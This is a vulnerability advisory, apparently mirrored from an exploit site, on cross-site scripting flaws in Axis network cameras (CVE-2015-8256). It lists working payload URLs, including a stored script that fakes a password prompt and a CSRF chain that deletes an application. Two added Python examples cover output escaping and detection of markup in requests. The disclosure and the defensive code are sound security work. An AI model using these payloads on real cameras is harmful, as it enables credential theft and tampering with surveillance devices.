ID 1337DAY-ID-24995 Type zdt Reporter Orwelllabs Modified 2016-04-11T00:00:00
Description
Exploit for hardware platform in category web applications
I. ADVISORY INFORMATION
-----------------------
Title: Axis Network Cameras Multiple Cross-site scripting
Vendor: Axis Communications
Class: Improper Input Validation [CWE-20]
CVE Name: CVE-2015-8256
Remotely Exploitable: Yes
Locally Exploitable: No
OLSA-ID: OLSA-2015-8256
Advisory URL:
http://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html
II. Background
--------------
Axis is the market leader in network video, invented the world’s first
network camera back in 1996 and we’ve been innovators in video surveillance
ever since. Axis network video products are installed in public places and
areas such as retail chains, airports, trains, motorways, universities,
prisons, casinos and banks.
III. Vulnerability
------------------
AXIS Network Cameras are prone to multiple (stored/reflected) cross-site
scripting vulnerabilities.
IV. Technical details
---------------------
These attack vectors allow an attacker to execute arbitrary JavaScript code
in the user's browser (session) with these steps:
# 1 Attacker injects a JavaScript payload in the vulnerable page:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script
type="text/javascript>prompt("AXIS_PASSWORD:")</script>
This creates an entry in the general log file (/var/log/messages). So,
when the user views the log under 'system options' -> 'support' -> 'Logs &
Reports':
http://{axishost}/axis-cgi/admin/systemlog.cgi?id
a prompt for the password of the current user ('AXIS_PASSWORD') is
displayed.
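The stored vector works because request text written to the log is later placed into the log page without HTML encoding. The following added example (not part of the advisory and not Axis code) renders constructed log lines both ways and parses the result to show the difference; the function names and sample lines are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed sample lines (not captured from a device). The second line
# stands for an entry whose text was copied from a request parameter.
SAMPLE_LOG = [
    "Apr 11 10:08:40 camera httpd: admin session opened",
    "Apr 11 10:08:45 camera vaconfig.cgi: no application named "
    "'<script>alert(1)</script>'",
]

PAGE_TAGS = {"html", "body", "pre"}  # the only elements the viewer itself emits


def render_log_unsafe(lines):
    """Vulnerable pattern: log text is concatenated into the page as-is."""
    return "<html><body><pre>\n" + "\n".join(lines) + "\n</pre></body></html>"


def render_log_escaped(lines):
    """Hardened pattern: each line is HTML-encoded before it enters the page."""
    body = "\n".join(html.escape(line, quote=True) for line in lines)
    return "<html><body><pre>\n" + body + "\n</pre></body></html>"


class PageInspector(HTMLParser):
    """Collects element names and text the way an HTML parser sees the page."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.text = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_data(self, data):
        self.text.append(data)


def inspect_page(page):
    """Return (elements injected by log content, text a browser would show)."""
    parser = PageInspector()
    parser.feed(page)
    parser.close()
    injected = [t for t in parser.tags if t not in PAGE_TAGS]
    return injected, "".join(parser.text)


if __name__ == "__main__":
    for render in (render_log_unsafe, render_log_escaped):
        injected, _ = inspect_page(render(SAMPLE_LOG))
        print(render.__name__, "injected elements:", injected)
```

In the escaped rendering the log entry is still readable in full, but it reaches the browser as text rather than as an element.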
However, due to the CSRF also present, it is even possible to perform all
the actions already presented: create, edit and remove users and
applications, etc. For example, to delete an application "axis_update" via
SXSS (stored XSS):
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script>
* A reflected cross-site scripting vulnerability affects all models of AXIS
devices on the same parameter:
http://{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--
# Other Vectors
http://{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs" onerror=alert(7) /><!--
http://{axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script>
http://{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>
# SCRIPTPATHS:
{HTMLROOT}/showReport.shtml
{HTMLROOT}/config.shtml
{HTMLROOT}/incl/top_incl.shtml
{HTMLROOT}/incl/popup_header.shtml
{HTMLROOT}/incl/page_header.shtml
{HTMLROOT}/incl/top_incl_popup.shtml
{HTMLROOT}/viewAreas.shtml
{HTMLROOT}/vmd.shtml
{HTMLROOT}/custom_whiteBalance.shtml
{HTMLROOT}/playWindow.shtml
{HTMLROOT}/incl/ptz_incl.shtml
{HTMLROOT}/view.shtml
{HTMLROOT}/streampreview.shtml
And many, many others...
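With no vendor fix available, one compensating check is to inspect requests before they reach the camera. This added example (not from the advisory) percent-decodes each query parameter and flags values that carry HTML markup, using vectors listed in the advisory as test input. It assumes a reverse proxy or log pipeline that exposes the request target; all function names and sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Paths taken from the vectors in the advisory. The advisory says many more
# pages are affected, so this set only labels findings; it is not a filter.
ADVISORY_PATHS = {
    "/axis-cgi/vaconfig.cgi", "/view/view.shtml", "/admin/config.shtml",
    "/view/custom_whiteBalance.shtml", "/admin-bin/editcgi.cgi",
    "/operator/recipient_test.shtml", "/admin/showReport.shtml",
}

# Start of a tag, closing tag or comment, or an inline event-handler attribute.
MARKUP = re.compile(r"""<[a-z/!]|(?:^|[\s"'/])on[a-z]+\s*=""", re.IGNORECASE)

# Constructed request targets. The last path is hypothetical and stands for
# a page that is not named in the advisory.
SAMPLE_TARGETS = [
    "/view/view.shtml?imagePath=/mjpg/video.mjpg",
    "/axis-cgi/vaconfig.cgi?action=get&name=axis_update",
    "/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E",
    "/view/custom_whiteBalance.shtml?imagePath="
    "%3Cimg%20src=%22xs%22%20onerror=alert(7)%20/%3E%3C!--",
    "/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle="
    "axis%3C/title%3E%3C/head%3E%3Cbody%3E%3Cpre%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "/local/status.shtml?note=%3Cb%3Ehi%3C/b%3E",
]


def query_pairs(query):
    """Split a raw query string on '&' and decode each name and value once."""
    pairs = []
    for field in query.split("&"):
        if not field:
            continue
        # Split at the first '=' only: values may themselves contain '='.
        name, _, value = field.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def inspect_request(target):
    """Return one finding per query parameter whose decoded value has markup."""
    parts = urlsplit(target)
    findings = []
    for name, value in query_pairs(parts.query):
        if MARKUP.search(value):
            findings.append({
                "path": parts.path,
                "param": name,
                "value": value,
                "listed": parts.path in ADVISORY_PATHS,
            })
    return findings


def scan(targets):
    """Inspect every request target and collect the findings in order."""
    findings = []
    for target in targets:
        findings.extend(inspect_request(target))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_TARGETS):
        label = "advisory path" if f["listed"] else "other path"
        print(f'{f["path"]} [{label}] {f["param"]}={f["value"]!r}')
```

The check matches on decoded parameter values rather than on the path, so it also covers pages the advisory does not list.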
V. Impact
---------
Allows an attacker to run arbitrary code on a victim's browser and computer
if combined with other flaws in the same devices.
VI. Affected products
---------------------
Multiple Axis Network products.
VII. Solution
-------------
No solution to the problem was provided.
VIII. Credits
-------------
The vulnerability has been discovered by SmithW from OrwellLabs
IX. Legal Notices
-----------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
X. Vendor solutions and workarounds
-----------------------------------
There was no response from the vendor.
# 0day.today [2018-01-04] #